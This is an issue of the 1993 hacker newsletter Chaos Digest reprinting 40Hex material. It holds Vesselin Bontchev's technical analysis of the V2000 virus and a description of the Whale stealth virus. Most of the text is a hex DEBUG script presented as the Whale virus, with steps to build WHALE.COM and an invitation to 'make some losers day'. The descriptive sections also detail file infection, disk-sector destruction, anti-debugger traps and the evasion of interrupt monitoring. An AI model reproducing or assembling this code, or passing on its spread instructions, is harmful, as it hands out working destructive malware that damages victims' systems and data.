Text File
529 lines
Chaos Digest Mercredi 19 Mai 1993 Volume 1 : Numero 28
ISSN 1244-4901
Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.28 (19 Mai 1993)
File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)
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Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)
Date: 02 Feb 90 10:49:00 +0700
From: Vesselin Bontchev
This virus is also "made in Bulgaria" and again I am indirectly the cause of
its creation. I am a well known "virus-buster" in Bulgaria and my antivirus
programs are very widely used. Of course, virus designers didn't like it.
So their next creation... causes trouble to my antivirus programs.
This virus is exactly 2000 bytes long and I think that it was created by the
author of the Eddie (Dark Avenger) virus. The programming style is the same
and there are even pieces of code which are the same.
The virus acts much like the Eddie one --- it installs resident in memory by
manipulating the memory control blocks; infects COMMAND.COM at the first run;
infects both .COM- and .EXE-files; infects files when one executes them as
well as when one copies them.
However, there are some extras added. First, the virus is able to fetch the
original INT 13h vector just like the V512 one (by using the same
undocumented function --- tricks spread fast between virus programmers).
Second, it intercepts the find-first (FCB) and find-next (FCB) functions --
just like V651 (aka EDDIE II) (and contains the same bugs), so you won't see
the increased file lengths in the listing displayed by the DIR command.
Third, it contains the string "Copyright (C) 1989 by Vesselin Bontchev", so
people may think that I am the author of this virus. In fact, the virus
searches every program being executed for this string (the case of the
letters does not matter) and if found, hangs the system. It is not necessary
to tell you that all my antivirus programs contain this string. Of course,
now I will have to use some kind of encryption, just to prevent such tricks.
Vesselin Bontchev reported in May 1990:
The V2000 virus (DARK AVENGER 2000)
- It turned out that the example of this virus I sent to some of the
antivirus researchers was not the original version. The original contains
the string "Only the Good die young..." instead of the "Copy me - I want to
travel" message. Also a small piece of code in the original version was
patched to contain the "666" string. (That is, the version you have contains
this string, the original does not.)
- There exists also a small mutation of the version you have. The only
difference is that the C' character in the word "Copy" was changed to Z'.
- When describing the V2000 virus, I stated that it halts the computer if you
run a program which contains the string "Copyright (c) 1989 by Vesselin
Bontchev". This is not quite correct. In fact, the programs are only checked
for the "Vesselin Bontchev" part of the string.
- I obtained John McAfee's program Clean, version 60. In the accompanying
documentation he states about the V2000 virus that "The virus is very
virulent and has caused system crashes and lost data, as well as causing some
systems to become non-bootable after infection". This is not very correct,
or at least, there is much more to be said. The virus is exactly as virulent
as the Dark Avenger virus, and for the same reason. It infects files not
only when one executes them, but also when one reads or copies them. This is
achieved exactly in the same manner as in the Dark Avenger. The systems
become non-bootable when the virus infects the two hidden files of the
operating system - it cannot distinguish them from the regular .COM files.
By the way, the Dark Avenger virus often causes the same effect. And at
last, but not least (:-)), the virus is highly destructive - just as the Dark
Avenger is. It destroys the information on a randomly selected sector on the
disk once in every 16 runs of an infected program. The random function is
exactly the same, and the counters (0 to 15 and for the last attacked sector)
are exactly the same and on the same offsets in the boot sector as with the
Dark Avenger virus. The main difference is that the destroyed sector is
overwritten not with a part of the virus body, but with the boot sector
instead. This makes a bit more difficult to discover which files are
destroyed - the boot sector is contained in many "good" programs, such as
FORMAT, SYS, NDD. Also, the nastiest thing - the damage function is not
performed via INT 26h (which can be intercepted). The virus determines the
address of the device driver for the respective disk unit (using an
undocumented DOS function call, of course. I begin to wonder if Ralf Brown
did any good when he made the information in the INTERxyy file available :)).
Then it performs a direct call to that address. The device driver in DOS
does its work and issues the appropriate INT 13h. However the virus has
scanned the controllers' ROM space and has determined the original address of
the interrupt handler - just as the Dark Avenger virus does. Then it has
temporary replaced the INT 13h vector with the address of this handler. The
result is that the damage function cannot be intercepted.
- Also this virus (unlike Dark Avenger) supports PC-DOS version 4.0 and will
work (and infect) under it.
- The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the name "Diana
P.", this time written in cyrillics.
Unknown Source
40Hex Volume 1 Issue 2 0006
The Whale Virus
Oh yes here it is, the biggest and meanest virus around. First
before you go and compile it read what Patti thinks of it.
Aliases: Mother Fish, Stealth Virus, Z The Whale
V Status: Research
Discovered: August, 1990
Symptoms: .COM & .EXE growth; decrease in available memory;
system slowdown; video flicker; slow screen writes;
file allocation errors; simulated system reboot
Origin: Hamburg, West Germany
Eff Length: 9,216 Bytes
Type Code: PRhA - Parasitic Resident .COM & .EXE Infector
Detection Method: ViruScan V67+, Pro-Scan 2.01+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, CleanUp V67+, Pro-Scan 2.01+,
or Delete infected files
General Comments:
The Whale Virus was submitted in early September, 1990. This virus had been
rumored to exist since the isolation of the Fish 6 Virus in June, 1990. It
has been referred to by several names besides Whale, including Mother Fish
and Z The Whale. The origin of this virus is subject to some speculation,
though it is probably from Hamburg, West Germany due to a reference within
the viral code once it is decrypted.
The first time a program infected with the Whale Virus is executed, the Whale
will install itself memory resident in high system memory but below the 640K
DOS boundary. On the author's XT clone, the virus always starts at address
9D90. Available free memory will be decreased by 9,984 bytes. Most
utilities which display memory usage will also indicate a value for total
system memory which is 9,984 bytes less than what is actually installed.
The following text string can be found in memory on systems infected with the
Whale virus:
Immediately upon becoming memory resident, the system user will experience
the system slowing down. Noticeable effects of the system slowdown include
video flicker to extremely slow screen writes. Some programs may appear to
"hang", though they will eventually execute properly in most cases since the
"hang" is due to the slowing of the system.
When a program is executed with the Whale memory resident, the virus will
infect the program. Infected programs increase in length, the actual change
in length is usually 9,216 bytes. Note the "usually": this virus does
occasionally infect a program with a "mutant" which will be a different
length. If the file length increase is exactly 9,216 bytes, the Whale will
hide the change in file length when a disk directory command is executed.
If the file length of the viral code added to the program is other than 9,216
bytes, the file length displayed with the directory command will either the
actual infected file length, or the actual infected file length minus 9,216
Executing the DOS CHKDSK program on infected systems will result in file
allocation errors being reported. If CHKDSK /F is executed, file damage
will result.
The Whale also alters the program's date/time in the directory when the file
is executed, though it is not set to the system date/time of infection.
Occasionally, Whale will alter the directory entry for the program it is
infecting improperly, resulting in the directory entry becoming invalid.
These programs with invalid directory entries will appear when the directory
is listed, but some disk utilities will not allow access to the program.
In these cases, the directory entry can be fixed with Norton Utilities FD
command to reset the file date.
The Whale occasionally will change its behavior while it is memory resident.
While most of the time it only infects files when executed, there are periods
of time when it will infect any file opened for any reason. It will also, at
times, disinfect files when they are copied with the DOS copy command, at
other times it will not "disinfect on the fly".
Occasionally, the Whale Virus will simulate what appears to be a system
reboot. While this doesn't always occur, when it does occur the Break key
is disabled so that the user cannot exit unexpectedly from the execution of
the system's AutoExec.Bat file. If the AutoExec.Bat file contained any
software which does file opens of other executable programs, those opened
executable programs will be infected at that time if they were not previously
infected. Typically, files infected in this manner will increase by 9,216
bytes though it will not be shown in a directory listing.
A hidden file may be found in the root directory of drive C: on infected
files. This file is not always present, the virus will sometimes remove it,
only to recreate it again at a later time. The name of this hidden file is
FISH-#9.TBL, it contains an image of the hard disk's partition table along
with the following message:
"Fish Virus #9
A Whale is no Fish!
Mind her Mutant Fish
and the hidden Fish Eggs
for they are damaging.
The sixth Fish mutates
only if the Whale is in
her Cave."
After the discovery of this hidden file, the author of this document made
several attempt to have the Fish 6 Virus mutate by introducing it and Whale
into a system. Under no circumstances did a mutation of either virus result,
the resultant files were infected with both an identifiable Fish 6 infection
and a Whale infection.
Whale is hostile to debuggers and contains many traps to prevent successful
decryption of the virus. One of its "traps" is to lock out the keyboard if
it determines a debugger is in use.
Here's a side note by the author of F-Prot
This is a recent, rather remarkable virus. It is long, 9216 bytes and
able to infect COM and EXE files. The increase in file size is not
visible though, while the virus is active in memory, as it uses several
advanced "stealth" methods. Other effects of the virus are not known,
but one infected program displayed the following message when run:
I AM 'knzyvo ' IN HAMBURG addr error D9EB,02
Most of the virus is devoted to encryption and code which moves blocks of
virus code around. This overhead results in a considerable slowdown of
infected systems.
And here it is. Use your editor to copy the below machine language
script to a file called WHALE.SCR Next use DEBUG to make it into a
COM file. Use the command DEBUG < WHALE.SCR When it gets done
you'll see a file called WHALE.COM. There it is, have fun - and
make some losers day!
n whale.com
e 0100 E9 C9 23 01 F5 21 E1 02 C0 00 D2 07 FF FF 99 14
e 0110 00 E9 B8 23 CD 20 8D 01 BD 00 E1 02 C0 00 D2 07
e 0120 FF FF 99 14 FE FF E3 8F 01 00 99 14 1E 00 00 00
e 0130 26 FB 5A 26 47 48 63 33 57 6E 52 4C 63 3D FF 10
e 0140 D4 06 75 EC 06 7E 17 75 25 FA 03 24 3D 8B 21 90
e 0150 C3 24 67 2A 08 12 07 C4 E0 5B 08 9C 06 E1 15 66
e 0160 03 7B 25 7D D4 06 4E 36 9C 08 90 C3 24 D4 06 4C
e 0170 36 FF 38 D4 06 4A 36 35 02 40 C7 20 7D 25 E5 13
e 0180 C7 20 48 25 26 34 C3 77 3D 8B 29 3D 8B 38 48 81
e 0190 E5 5C 01 BA 1D 53 AF CD CF CF 22 02 D9 A7 29 27
e 01A0 4A 2E D9 14 2E 05 24 5F D5 B7 EB 38 1D 1F CE BF
e 01B0 FF CC 4B BB 11 1B 81 11 06 EF A5 D0 02 A7 24 68
e 01C0 63 AD 0A 07 0C E8 A2 14 E8 5E 1A 38 38 E5 68 30
e 01D0 23 BD DB 29 AA 6A 23 92 26 48 3A F5 2C 38 B3 4A
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e 0200 0E F6 BD 2D 27 CE 28 09 1C D3 5C BE DE C0 E7 83
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e 0220 D8 FE E4 6A D5 F7 C2 15 C6 AD F7 2A 21 D5 8C C2
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e 0290 3D C4 52 F8 2C C0 D4 48 21 F9 FD FC 90 E0 91 CB
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e 0440 1C 1B 22 C8 ED C4 67 EB DA 0A E9 D9 0A E9 DF 1E
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e 0470 F1 F0 88 D0 12 FC D0 62 CD 66 C8 23 C2 ED 23 F6
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e 04A0 A7 68 7A C6 B9 54 B0 6A C9 6B D3 3C 49 01 92 9A
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e 0670 B4 B5 BC 3E 77 18 96 5B 44 72 61 03 CF 33 01 CE
e 0680 D2 04 06 67 C0 50 D7 75 5C 3C F4 BD 77 FA 91 DC
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e 07F0 CE 43 03 2A CA 50 2C 41 9E F3 C0 9E DF 22 50 E5
e 0800 C7 75 23 FB 74 2C 60 4D CF 93 FC CF 50 03 AF 45
e 0810 02 AF 5D 04 CD F7 21 2A 11 E6 07 20 DB 75 AE 20
e 0820 26 0C 89 CF FB 00 26 48 53 7C 1D 58 23 03 00 27
e 0830 D0 33 F5 92 EE AE E8 E8 BE E8 E9 E0 16 EB CF B1
e 0840 06 A1 C0 89 38 17 00 2D DA 74 E6 5A E9 75 13 B9
e 0850 3A 13 53 71 FB E8 CD 11 1E 50 8D 2B AC 8D AA AC
e 0860 4B 89 46 03 53 D9 2B 8E D9 23 8A 4E 37 9E EB 67
e 0870 F5 2F 71 77 B8 77 6C 4F 67 7C CE D5 02 3E A5 3D
e 0880 97 A6 F1 92 F6 3D CF A1 37 63 ED E5 11 56 FF D6
e 0890 A4 6E CB 4D 45 89 BC 74 7B 90 C4 22 FA 04 D9 01
e 08A0 EB B7 9A 16 22 13 8B 38 1F 00 C2 12 0B EF 67 10
e 08B0 1E CA 72 2A 94 DA AF 05 04 26 22 C2 C4 F1 74 2D
e 08C0 92 C6 5E 17 E8 2D E8 E9 8E 1A EA CF 90 02 08 D5
e 08D0 84 6F 19 E8 2D DA 74 D5 9A 1E 2A 13 33 F5 9A 16
e 08E0 22 13 31 F6 B0 0C 26 FA 16 DB 92 C6 B6 27 B9 3A
e 08F0 13 F3 82 20 C9 CE FB 4A 24 5A F8 84 F4 71 08 E5
e 0900 FF 67 CE F8 61 5E DC 2D 4F 47 6B CF F6 C1 60 AD
e 0910 CC 60 BD CE EE F7 FA 68 2A DE CE 08 21 62 AD CC
e 0920 62 BD CE C6 04 FD 68 22 DE 62 AD FD 62 BD FF 52
e 0930 E4 DE 2C BD D0 EA F8 6A CC 71 24 C5 07 C8 8D DD
e 0940 36 AD E1 94 FA 5C D8 28 DE 52 C6 C3 75 90 C6 33
e 0950 A8 7D 33 FB F1 D9 90 C6 24 A8 8B 53 FB E8 D9 90
e 0960 C6 24 A8 81 26 FB DF D9 90 C6 2E A8 08 2C FB D6
e 0970 D9 90 C6 24 A8 2F 16 FB CD D9 90 C6 24 A8 A5 24
e 0980 FB C4 D9 90 C6 78 A8 7D 33 FB BB D9 90 C6 23 A8
e 0990 9F 86 FB B2 D9 90 C6 2C A8 A7 26 FB A9 D9 90 C6
e 09A0 2A A8 2D A1 FB A0 D9 90 C6 24 A8 29 5E FB 97 D9
e 09B0 90 C6 24 A8 29 64 FB 8E D9 90 C6 24 A8 C0 3C FB
e 09C0 85 D9 90 C6 4A A8 14 37 FB 7C D9 90 C6 29 A8 00
e 09D0 26 FB 73 D9 90 C6 2D A8 E3 24 FB 6A D9 48 C3 CE
e 09E0 72 01 0A BA A7 88 05 1C AB 03 8C 8F 33 7F 7C 1E
e 09F0 B7 DD B4 B6 3B B5 13 3A 9E 87 70 AC CF AA 0E B9
e 0A00 A1 45 BF E9 9F 5F 89 76 8D 0F E4 B6 67 C0 B1 A2
e 0A10 67 70 08 D7 1E E3 37 E8 0F 12 27 26 9F C0 A7 F8
e 0A20 00 02 0E 00 26 20 D2 08 98 0E E5 37 49 27 D8 15
e 0A30 26 13 41 D1 E2 89 62 30 92 B5 E4 F1 AF 57 21 CE
e 0A40 54 18 0E FA 5D DB FB FA 26 26 52 9C AF A8 90 60
e 0A50 5E 76 A7 73 C4 43 BA 14 BA DE BC CD 93 4F 80 26
e 0A60 6C 6F DE 72 D5 77 5A C8 4C E6 64 5C 6B A9 52 74
e 0A70 1B D1 B6 50 E2 76 A9 A1 8E A9 6C 8E A9 58 6C 77
e 0A80 C3 E9 FA 06 DC FB E8 9C 13 1A B6 6B 3E 4C 67 B1
e 0A90 92 7E 76 97 AD 55 A0 11 B5 06 81 78 78 79 78 AF
e 0AA0 79 78 53 94 8B E5 FB 80 2E FB 17 2E 61 43 08 93
e 0AB0 3E 84 37 00 52 28 E8 DE 02 83 DD EC 74 15 FB 82
e 0AC0 26 37 84 8C 69 8A 00 B3 8A A5 2E 90 A2 28 D6 86
e 0AD0 A4 44 50 38 AA 03 34 A0 84 1E C1 5C B1 0D FF B1
e 0AE0 0D FC 6B 6C 01 80 A1 08 93 26 95 37 FE CF A0 FC
e 0AF0 CE FA 97 DF FB 4C 26 00 D5 FD C1 3D D8 CE 6C E7
e 0B00 C6 FB 52 65 F1 4C 94 F1 1B B8 C2 E7 E1 AF 53 04
e 0B10 26 1D 4E 26 53 E5 26 E1 56 FE 26 13 E8 05 17 2E
e 0B20 D8 15 A2 02 F8 C1 9D FA 61 DF 2E E8 33 13 0F 7E
e 0B30 FF 77 78 65 A7 68 2D 7D 78 54 5F 96 00 4F 6E D0
e 0B40 E9 34 10 3D F3 05 74 DE 3E EF 34 5D FE E1 FA 99
e 0B50 DB 98 D5 AF F6 BB 75 D0 53 EA AD 01 9D 19 C0 52
e 0B60 10 E9 BE 11 E8 FA EC 4D 74 5F 00 5A CD 54 52 65
e 0B70 7C FD 5F 76 50 6F 97 42 65 76 CD 4F 52 CB B0 76
e 0B80 7A 46 A1 D0 1F 4D CD 11 52 CB 46 77 87 E5 E9 8B
e 0B90 BE BA 52 B8 0F 5A CE 54 92 65 7C FB 47 BA 50 6F
e 0BA0 DD 72 F2 76 7A F9 53 3F 46 CE CF B0 76 5A BE 4C
e 0BB0 41 65 BA A0 57 1C 55 31 2E A5 1D B3 02 12 2E D9
e 0BC0 25 B3 02 3D FF 10 FB 24 08 EC 36 C0 37 55 08 D7
e 0BD0 1E 02 37 89 C3 FA BD DE 9A 04 CE 75 FF 02 29 D2
e 0BE0 5B 2E 34 1B 90 2E 1C 96 68 38 07 9B BF 0D C8 B3
e 0BF0 5C 37 3A EE 7F E2 29 3A 32 D7 3C BE 0D D1 F7 C1
e 0C00 BD 0A 0C 2E E3 25 03 03 90 FE 27 66 40 CE 20 FF
e 0C10 11 01 99 22 1B 12 B7 C3 02 80 50 3C CB 17 74 11
e 0C20 02 C1 1A 88 04 31 24 ED 02 19 12 1A 8E 14 37 24
e 0C30 11 2A 13 12 B7 C2 02 1A 88 0C 35 24 ED 02 15 12
e 0C40 1A 8E 14 CB 25 FA 75 17 2A CF 00 01 2F FA D8 26
e 0C50 FB F0 D8 D7 30 FE C7 C8 FF 24 30 38 11 37 55 C1
e 0C60 CA D5 11 F0 AD 02 30 AF 59 30 FE CD CF AD 50 31
e 0C70 AF 29 30 FE C6 CF AD 70 32 AF 3F 30 FE FF CF AD
e 0C80 73 35 AF 29 30 FE F0 CF AD 26 37 AF 63 30 FE E9
e 0C90 CF AD B3 37 AF 75 30 FE E2 CF AD 13 3A AF 07 30
e 0CA0 FE 9B CF AD 29 3C AF 2D 30 FE 8C CF AD E7 3C AF
e 0CB0 1F 30 FE 85 CF AD 79 20 AF 0E 30 FE BE CF AD 25
e 0CC0 21 AF 0A 30 FE B7 CF AD 29 11 AF 44 30 FE A8 CF
e 0CD0 AD 50 11 AF FB 30 FE A1 CF AD 4F 13 AF 1A 30 FE
e 0CE0 5A CF AD 5E 2D AF 06 30 FE 53 CF AD 5F 2C AF 61
e 0CF0 30 FE 44 CF 2A C3 44 0C 0D F7 10 BB 15 E2 D7 8B
e 0D00 8E 06 AC 18 70 03 D6 AD E8 D1 25 36 16 DC CF FE
e 0D10 FE 26 FE 86 C7 FE 52 25 D3 D0 5B A7 D0 78 24 41
e 0D20 83 CB 11 FF C3 FA DB 26 FB 18 D8 0B 90 3D 87 93
e 0D30 F2 81 C3 3D DF 94 37 70 D8 E5 02 63 FF C5 91 6E
e 0D40 D8 78 F3 96 89 52 7B 0E 39 A9 07 03 FB 74 23 FB
e 0D50 5F 29 3D FE 20 FC 24 CE FB 01 08 ED 0E C9 37 E8
e 0D60 C7 EE 46 FC 7D 8B D2 36 CC 9A EC 32 E1 31 32 62
e 0D70 3E 32 9F 3E 54 27 47 19 D2 36 EC 4F ED F4 03 FF
e 0D80 32 D8 E7 25 CA 2F FE 73 CF D0 FC 46 DC F0 C9 C4
e 0D90 4C EB 1F EA C3 DA 14 1A 2D E3 54 82 D2 42 FC 03
e 0DA0 ED F4 72 DF DB D9 21 3A E8 8E 2E D9 3D 03 03 FB
e 0DB0 91 DB 0D 4C E1 03 4D E1 DF 07 B6 D6 48 E1 DF 01
e 0DC0 B6 D6 08 68 D4 CC 25 83 C5 2E 5B A4 68 4E A4 D2
e 0DD0 4B 53 CD 98 2E E0 97 10 34 FA 5D 9F 17 00 AA C8
e 0DE0 09 CD 9D DB F7 F0 E2 DA 9A C8 9F 0F 00 24 34 43
e 0DF0 C4 E8 50 AD 1C 0E 7E C3 EF CF 0E 04 1A 12 74 36
e 0E00 FA 88 D0 12 CB A7 E8 34 0E 61 F8 A7 E2 21 07 B2
e 0E10 E8 16 EE 28 26 3D 83 28 A0 24 27 3D 8C 20 35 24
e 0E20 08 9A 1E 02 37 E8 B4 E5 2E D9 05 66 03 FB 0C D1
e 0E30 3D C4 38 37 24 00 D6 77 34 FB 4D 32 3A 73 25 FA
e 0E40 9E 26 3D 80 00 A0 24 D8 90 FE 27 67 41 CE E0 FC
e 0E50 3E 13 8B 22 10 44 24 40 8B 7A 17 81 D5 5B 53 A7
e 0E60 E0 49 60 12 D8 7D FB 20 32 0A 75 71 FB D4 DA 08
e 0E70 00 AD 4F 01 AD 93 4B FA 9A 04 AD 93 4D FA 9A 44
e 0E80 24 98 80 69 CF 89 62 17 E8 D8 00 1C CD 26 E8 94
e 0E90 EF 30 26 98 16 3C 13 E8 A9 17 2E AD 1D A3 02 90
e 0EA0 C1 36 12 CA 00 9A 57 32 B2 18 26 35 89 61 01 A1
e 0EB0 34 13 03 E7 35 89 61 03 A1 32 13 26 AF 54 0E CE
e 0EC0 D4 13 17 FB 7D DA 0B 00 CE 4D 04 08 9D 1E 85 37
e 0ED0 8B 60 11 A3 2C 13 8B 60 17 A3 2A 13 E8 8C 00 19
e 0EE0 CF D3 F8 08 9F 0E 1C 11 2E AA 05 3C 24 3D 89 00
e 0EF0 2D 02 08 D5 06 1F 11 01 38 4B E8 60 EF 37 B6 6B
e 0F00 AA 40 37 BA 98 7C 86 D0 A6 11 4F 4B 97 C5 88 11
e 0F10 4F 44 97 C3 88 10 48 87 E2 B0 AD 56 B0 59 B4 B7
e 0F20 AD 10 88 59 B4 B6 F7 97 5E 0C 65 EE 6A 93 B6 6B
e 0F30 18 43 6B C4 A5 BB 2E A6 2D DA 02 13 74 25 FA 20
e 0F40 27 D0 E8 D8 E8 27 96 8D 76 90 A2 B0 7F 8D 76 90
e 0F50 A1 B0 2E 8D 76 90 A0 B0 B5 4B 62 87 4B 9D 97 65
e 0F60 B6 B6 A3 B1 17 9D B0 B2 EE EA 7E BF A3 BE 67 0E
e 0F70 A7 2D 00 02 49 4D 52 15 FE 28 33 00 52 68 E8 E4
e 0F80 E8 10 44 D0 66 60 A0 83 B3 90 67 44 73 5B B4 99
End of Chaos Digest #1.28